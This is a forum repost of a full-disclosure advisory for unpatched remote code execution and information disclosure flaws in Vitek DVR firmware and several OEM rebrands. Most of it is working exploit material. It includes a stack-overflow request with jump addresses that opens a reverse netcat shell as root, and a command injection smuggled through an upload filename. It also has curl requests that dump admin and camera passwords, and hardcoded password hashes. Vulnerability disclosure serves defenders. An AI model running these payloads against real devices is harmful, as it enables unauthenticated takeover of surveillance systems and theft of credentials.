Jump to content
Fi8sVrs

Vitek Remote Code Execution / Information Disclosure

Recommended Posts

  • Active Members

Vitek suffers from remote code execution and information disclosure vulnerabilities.

 

[STX]

Subject: Vitek RCE and Information Disclosure (and possible other OEM)

Attack vector: Remote
Authentication: Anonymous (no credentials needed)
Researcher: bashis <mcw noemail eu> (December 2017)
PoC: https://github.com/mcw0/PoC
Release date: December 22, 2017
Full Disclosure: 0-day

heap: Executable + Non-ASLR
stack: Executable + ASLR

-[Manufacture Logo]-
            _ _ _ _ _ _ _ _ _ _ _ _
            \  _  _   _  _ _ ___
            / /__/ \ |_/
           / __   /  -  _ ___
          / /  / /  / /
  _ _ _ _/ /  /  \_/  \_ ______
___________\___\__________________


-[OEM (found in the code)]-
Vitek (http://www.vitekcctv.com/) - Verified: VT-HDOC16BR_Firmware_1.02Y_UI_1.0.1.R
Thrive
Wisecon
Sanyo
Inodic
CBC
Elbex
Y3K
KTNC


-[Stack Overflow RCE]-

[Reverse netcat shell]

$ echo -en "GET /dvrcontrol.cgi?nc\x24\x7bIFS\x7d192.168.57.1\x24\x7bIFS\x7d31337\x24\x7bIFS\x7d-e\x24\x7bIFS\x7dsh\x24\x7bIFS\x7d HTTP/1.0\r\nAuthorization Pwned: `for((i=0;i<272;i++)); do echo -en "A";done`\x80\x9a\x73\x02\xc8\x4a\x11\x20\r\n\r\n"|ncat 192.168.57.20 81

[Listener]

$ ncat -vlp 31337
Ncat: Version 7.60 ( https://nmap.org/ncat )
Ncat: Generating a temporary 1024-bit RSA key. Use --ssl-key and --ssl-cert to use a permanent one.
Ncat: SHA-1 fingerprint: E672 0A5B B852 8EF9 36D0 E979 2827 1FAD 7482 8A7B
Ncat: Listening on :::31337
Ncat: Listening on 0.0.0.0:31337

Ncat: Connection from 192.168.57.20.
Ncat: Connection from 192.168.57.20:36356.

pwd
/opt/fw

whoami
root
exit
$

Note:
1. Badbytes: 0x00,0x09,0x0a,0x0b,0x0c,0x0d,0x20
2. 0x20 will be replaced with 0x00 by the H4/H1/N1 binary, use this to jump binary included system() address: 0x00114AC8 [system() call in H4]
3. 0x02739A0C + 0x74 = $r11 address we need (0x2739A80) to point our CMD string on heap for system() in $r0

H1:
VT-HDOC4E_Firmware_1.21A_UI_1.1.C.6
.rodata:005292E8 aEchoSOptVideoS DCB "echo %s > /opt/video_standard",0
.text:001CD138                 SUB             R3, R11, #0x74
.text:001CD13C                 MOV             R0, R3
.text:001CD140                 BL              system

H4:
VT-HDOC16BR_Firmware_1.02Y_UI_1.0.1.R
.rodata:00B945A0 aEchoSOptVideoS DCB "echo %s > /opt/video_standard",0
.text:00114AC8                 SUB             R3, R11, #0x74
.text:00114ACC                 MOV             R0, R3
.text:00114AD0                 BL              system

N1:
VT-HDOC8E_Firmware_1.21E_UI_1.1.C.6
.rodata:004A4AC4 aEchoSOptVideoS DCB "echo %s > /opt/video_standard",0
.text:001E9F0C                 SUB             R3, R11, #0x74
.text:001E9F10                 MOV             R0, R3
.text:001E9F14                 BL              system


-[PHP RCE]-

Note: /mnt/usb2 must be mounted and R/W... (normally R/O w/o USB stick inserted)

[Reverse netcat shell (forking)]

$ curl -v 'http://192.168.57.20:80/cgi-bin/php/htdocs/system/upload_check.php' -H "Content-Type: multipart/form-data; boundary=----WebKitFormBoundary1337" -d "`echo -en "\r\n\r\n------WebKitFormBoundary1337\r\nContent-Disposition: form-data; name=\"MAX_FILE_SIZE\"\r\n\r\n100000000\r\n------WebKitFormBoundary1337\r\nContent-Disposition: form-data; name=\"userfile\"; filename=\"\|\|nc\$\{IFS\}\$\{REMOTE_ADDR\}\$\{IFS\}31337\$\{IFS\}-e\$\{IFS\}sh\$\{IFS\}\&\$\{IFS\}\|\|\"\r\nContent-Type: application/gzip\r\n\r\nPWNED\r\n\r\n------WebKitFormBoundary1337--\r\n\r\n"`" -X POST

200 OK
[...]
> ERROR : Current_fw_info File Open Error<br>> ERROR : dvr_upgrade File Open Error<br>F/W File(||nc${IFS}${REMOTE_ADDR}${IFS}31337${IFS}-e${IFS}sh${IFS}&${IFS}||) Upload Completed.<br>If you want to upgrade please click START button<br><br><form enctype="multipart/form-data" action="fw_update.php" method="post"><input type="hidden" name="PHPSESSID" value="67eaa14441089e5d2e7fe6ff0fa88d42" /><input type="submit" value="START"></form>	</tbody>
[...]

[Listener]

$ ncat -vlp 31337
Ncat: Version 7.60 ( https://nmap.org/ncat )
Ncat: Generating a temporary 1024-bit RSA key. Use --ssl-key and --ssl-cert to use a permanent one.
Ncat: SHA-1 fingerprint: 76D3 7FA3 396A B9F6 CCA6 CEA5 2EF8 06DF FF72 79EF
Ncat: Listening on :::31337
Ncat: Listening on 0.0.0.0:31337
Ncat: Connection from 192.168.57.20.
Ncat: Connection from 192.168.57.20:52726.

pwd
/opt/www/htdocs/system

whoami
nobody

ls -l /mnt/usb2/
total 4
drwxrwxrwx    2 nobody   nobody           0 Dec 16 02:55 dvr
-rw-------    1 nobody   nobody           7 Dec 16 02:55 ||nc${IFS}${REMOTE_ADDR}${IFS}31337${IFS}-e${IFS}sh${IFS}&${IFS}||
exit
$

-[Login / Password Disclosure]-

curl -v "http://192.168.57.20:80/menu.env" | hexdump -C
[binary config, login and password can be found for admin login and all connected cameras]

Admin l/p
[...]
00001380  00 00 00 00 01 01 00 01  01 01 01 00 00 00 00 00  |................|
00001390  00 00 00 00 00 41 44 4d  49 4e 00 00 00 00 00 00  |.....ADMIN......|
000013a0  00 00 00 00 00 00 00 00  00 00 00 00 00 00 00 00  |................|
*
00001400  00 00 00 00 00 00 00 00  00 00 00 00 00 00 31 32  |..............12|
00001410  33 34 00 00 00 00 00 00  00 00 00 00 00 00 00 00  |34..............|
00001420  00 00 00 00 00 00 00 00  00 00 00 00 00 00 00 00  |................|

Cameras l/p
[...]
00008d80  00 00 00 00 c0 00 a8 00  01 00 15 00 92 1f 00 00  |................|
00008d90  91 1f 00 00 72 6f 6f 74  00 00 00 00 00 00 00 00  |....root........|
00008da0  00 00 00 00 70 61 73 73  00 00 00 00 00 00 00 00  |....pass........|
00008db0  00 00 00 00 00 00 00 00  00 00 00 00 00 00 00 00  |................|
00008dc0  00 00 00 00 00 00 00 00  00 00 00 00 c0 00 a8 00  |................|
00008dd0  01 00 16 00 94 1f 00 00  93 1f 00 00 72 6f 6f 74  |............root|
00008de0  00 00 00 00 00 00 00 00  00 00 00 00 70 61 73 73  |............pass|
00008df0  00 00 00 00 00 00 00 00  00 00 00 00 00 00 00 00  |................|

-[Hardcode l/p]-
FTP: TCP/10021
TELNET: TCP/10023

/etc/passwd
root:$1$5LFGqGq.$fUozHRdzvapI2qBf1EeoJ0:0:0:root:/root:/bin/sh
woody:$1$e0vY7A0V$BjS38SsHNWC5DxEGlzuEP1:1001:100:woohyun digital user:/home/woody:/bin/sh

-[Korean hardcoded DNS]-
$ cat /etc/resolv.conf
nameserver 168.126.63.1
nameserver 0.0.0.0
nameserver 0.0.0.0
$

$ nslookup 168.126.63.1
1.63.126.168.in-addr.arpa	name = kns.kornet.net.
$ nslookup 168.126.63.2
2.63.126.168.in-addr.arpa	name = kns2.kornet.net.


-[Other Information Disclosure]-
curl -v "http://192.168.57.20:80/webviewer/netinfo.dat"
192,168,57,20
192,168,2,100
00:0A:2F:XX:XX:XX
00:0A:2F:YY:YY:YY
255.255.255.0
192.168.57.1

-[MAC Address Details]-
Company: Artnix Inc.
Address: Seoul 137-819, KOREA, REPUBLIC OF
Range: 00:0A:2F:00:00:00 - 00:0A:2F:FF:FF:FF
Type: IEEE MA-L

curl -v "http://192.168.57.20:80/webviewer/gw.dat"
Kernel IP routing table
Destination     Gateway         Genmask         Flags Metric Ref    Use Iface
192.168.2.0     0.0.0.0         255.255.255.0   U     0      0        0 eth1
192.168.57.0    0.0.0.0         255.255.255.0   U     0      0        0 eth0
0.0.0.0         192.168.57.1    0.0.0.0         UG    0      0        0 eth0

curl -v "http://192.168.57.20:80/cgi-bin/php/lang_change.php?lang=0"
Change GUI Language to English

[... and more]

[ETX]

Source: https://packetstormsecurity.com/files/145534/Vitek-Remote-Code-Execution-Information-Disclosure.html

Link to comment
Share on other sites

Join the conversation

You can post now and register later. If you have an account, sign in now to post with your account.

Guest
Reply to this topic...

×   Pasted as rich text.   Paste as plain text instead

  Only 75 emoji are allowed.

×   Your link has been automatically embedded.   Display as a link instead

×   Your previous content has been restored.   Clear editor

×   You cannot paste images directly. Upload or insert images from URL.



×
×
  • Create New...